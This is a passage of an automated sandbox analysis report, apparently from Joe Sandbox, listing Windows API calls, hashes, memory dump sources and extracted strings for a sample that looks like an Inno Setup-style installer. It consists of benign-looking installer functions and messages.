                                                                                                      • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 4071923889-0
                                                                                                      • Opcode ID: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                                      • Instruction ID: 44a5693fa59bfbe72ab063cfacecacb9b789a88f4d4f9747d0667cdf65a63c8e
                                                                                                      • Opcode Fuzzy Hash: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                                      • Instruction Fuzzy Hash: 7201F9716046087EEB20979E8C06F6B7BACDF44774F610167F904DB2C2C6785D40C668
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                                      • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                                      • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
                                                                                                      • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                                      • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                                      • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                                      • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                      • String ID:
                                                                                                      • API String ID: 730355536-0
                                                                                                      • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                      • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                      • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                      • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
                                                                                                      Strings
                                                                                                      • Unsetting NTFS compression on directory: %s, xrefs: 004700D3
                                                                                                      • Setting NTFS compression on directory: %s, xrefs: 004700BB
                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 004700FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                      • API String ID: 1452528299-1392080489
                                                                                                      • Opcode ID: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                                                                      • Instruction ID: 8e5543267561a70d3fbbbef991b1365390ff1382f756d9cdf86c8bb39141f558
                                                                                                      • Opcode Fuzzy Hash: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                                                                      • Instruction Fuzzy Hash: C9011730E0928C96CF05D7ADA0412DDBBF4DF4D314F84C1AFA45DE7282DA790609879A
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00470899
                                                                                                      Strings
                                                                                                      • Setting NTFS compression on file: %s, xrefs: 00470867
                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 004708AA
                                                                                                      • Unsetting NTFS compression on file: %s, xrefs: 0047087F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                      • API String ID: 1452528299-3038984924
                                                                                                      • Opcode ID: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                                                                      • Instruction ID: 78fa65e16581c334b53b8e167e27839d8ecb3154876bc13dabe901d18edf2e93
                                                                                                      • Opcode Fuzzy Hash: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                                                                      • Instruction Fuzzy Hash: 5C01F430D092489ADB04A7E9A4412EDBBF49F09314F45C1ABA459E7282DAB9050947DB
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                                                                      • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 4283692357-0
                                                                                                      • Opcode ID: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                                                                      • Instruction ID: 88a6b2d0cd2ebf9d052afffcb5c4be27c29a8e8e48dcb03e602a07ae18d4e81c
                                                                                                      • Opcode Fuzzy Hash: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                                                                      • Instruction Fuzzy Hash: E3F05EB6B4470176EA10B6B69C8BF2B229C9F54745F10883BBA00EF2C3D97CDC04962D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CountSleepTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227064392-0
                                                                                                      • Opcode ID: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                                                                      • Instruction ID: e9c2c7e2fc271270d41d52dba3350464f1e42bdffd51bbfd166b1ef271046f5a
                                                                                                      • Opcode Fuzzy Hash: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                                                                      • Instruction Fuzzy Hash: 93E02B7130964845CA24B2BE28C37BF4A88CB8536AB14453FF08CD6242C42C4D05956E
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                                                                      • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                                                                      • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 215268677-0
                                                                                                      • Opcode ID: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                                                      • Instruction ID: 3331d84468cd062744280f6e1aa24963878bc2b2d96e3aea022572b3ec77581d
                                                                                                      • Opcode Fuzzy Hash: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                                                      • Instruction Fuzzy Hash: 70F030716843016BD600EAB5CC82E9B77DCEB44754F04893E7E98D72C1DA79DC08AB66
                                                                                                      APIs
                                                                                                      • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                                      • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                                      • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 2280970139-0
                                                                                                      • Opcode ID: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                                                      • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                                      • Opcode Fuzzy Hash: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                                                      • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                                      APIs
                                                                                                      • GlobalHandle.KERNEL32 ref: 00406287
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocHandleLockUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2167344118-0
                                                                                                      • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                      • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                                      • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                      • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                                                                      Strings
                                                                                                      • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                                                                      • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                      • API String ID: 3535843008-1938159461
                                                                                                      • Opcode ID: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                                                                      • Instruction ID: 3bf0094b3715a844c7fa4d69accdb7e726d223c3dcefaf8b2e4f531663087c06
                                                                                                      • Opcode Fuzzy Hash: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                                                                      • Instruction Fuzzy Hash: 5F814174E00149AFCB10DF95D881ADEBBF9EF48314F5081AAE814B7392D7389E05CB99
                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                                                                      • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                                                                      Strings
                                                                                                      • Will not restart Windows automatically., xrefs: 00483176
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveForeground
                                                                                                      • String ID: Will not restart Windows automatically.
                                                                                                      • API String ID: 307657957-4169339592
                                                                                                      • Opcode ID: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                                                      • Instruction ID: df9a9ae9a8219d8b6a1298420550b74bcee7fa449f44545fa147fc9774bd32fa
                                                                                                      • Opcode Fuzzy Hash: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                                                      • Instruction Fuzzy Hash: A7413330208340AED710FFA4DC9AB6E3BA4DB15F05F1408B7E9404B3A2D6BD5A04DB1D
                                                                                                      Strings
                                                                                                      • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                                                                      • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                      • API String ID: 0-1974262853
                                                                                                      • Opcode ID: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                                                      • Instruction ID: 63d40b18a6e87dbc706e62a2b7ed59e25ea13cd94e581da409b3f01416405f56
                                                                                                      • Opcode Fuzzy Hash: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                                                      • Instruction Fuzzy Hash: 9A319E30A08244DFD711EB99D989BA977F6EB05308F1500FBF0489B392D779AE40CB1A
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                                                                      • %s\%s_is1, xrefs: 00478E2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      • API String ID: 47109696-1598650737
                                                                                                      • Opcode ID: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                                                      • Instruction ID: 403b8390735a8e98fed73365c843d129082673b7d0193522817cb9849c55968d
                                                                                                      • Opcode Fuzzy Hash: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                                                      • Instruction Fuzzy Hash: 79218470B40208AFDB01DFAACC55A9EBBE8EB48304F90847EE904E7381DB785D018A59
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                                                                      • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExecuteMessageSendShell
                                                                                                      • String ID: open
                                                                                                      • API String ID: 812272486-2758837156
                                                                                                      • Opcode ID: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                                                      • Instruction ID: 6e2feb9b457cb976a84d54f3b3258ed3b08e14d6ba220cef3ebd8abcd6e201e4
                                                                                                      • Opcode Fuzzy Hash: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                                                      • Instruction Fuzzy Hash: 62219474E40208AFDB00DFA5C886B9EB7F8EB44705F2081BAB514E7282D7789E05CB58
                                                                                                      APIs
                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00455318
                                                                                                      • GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                      • String ID: <
                                                                                                      • API String ID: 893404051-4251816714
                                                                                                      • Opcode ID: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                                                                      • Instruction ID: ea799879bbb6ab716a70283d096866571a468ac1fa4b8cc73728b10af3e72d10
                                                                                                      • Opcode Fuzzy Hash: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                                                                      • Instruction Fuzzy Hash: 02215370A00609ABDB10DFA5D8926AE7BF8AF18355F50443AFC44E7281D7789949CB58
                                                                                                      APIs
